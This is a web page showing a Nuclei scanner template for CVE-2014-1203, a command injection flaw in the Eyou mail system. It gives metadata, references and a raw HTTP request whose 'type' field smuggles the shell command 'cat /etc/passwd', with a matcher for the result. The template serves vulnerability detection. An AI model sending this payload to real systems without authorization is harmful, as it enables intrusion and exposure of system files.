Skip to content

Eyou E-Mail <3.6 - Remote Code Execution

ID: CVE-2014-1203

Severity: critical

Author: pikpikcu

Tags: cve2014,cve,seclists,rce,eyou

Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.

id: CVE-2014-1203
info:
name: Eyou E-Mail <3.6 - Remote Code Execution
author: pikpikcu
severity: critical
description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches.
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- https://nvd.nist.gov/vuln/detail/CVE-2014-1203
- http://seclists.org/fulldisclosure/2014/Jan/32
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-1203
cwe-id: CWE-77
epss-score: 0.02045
epss-percentile: 0.88951
cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: eyou
product: eyou
tags: cve2014,cve,seclists,rce,eyou
http:
- raw:
- |
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type='|cat /etc/passwd||'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100c1a2f92b1d04742d42493feb1a1739441a2b3edada4d4524c4f1c7b9a0a5b97d0221009b71c263258ee7dc3534de1d858e2ab9e9c9757742f32535a3bada418c716ec6:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-1203.yaml"

View on Github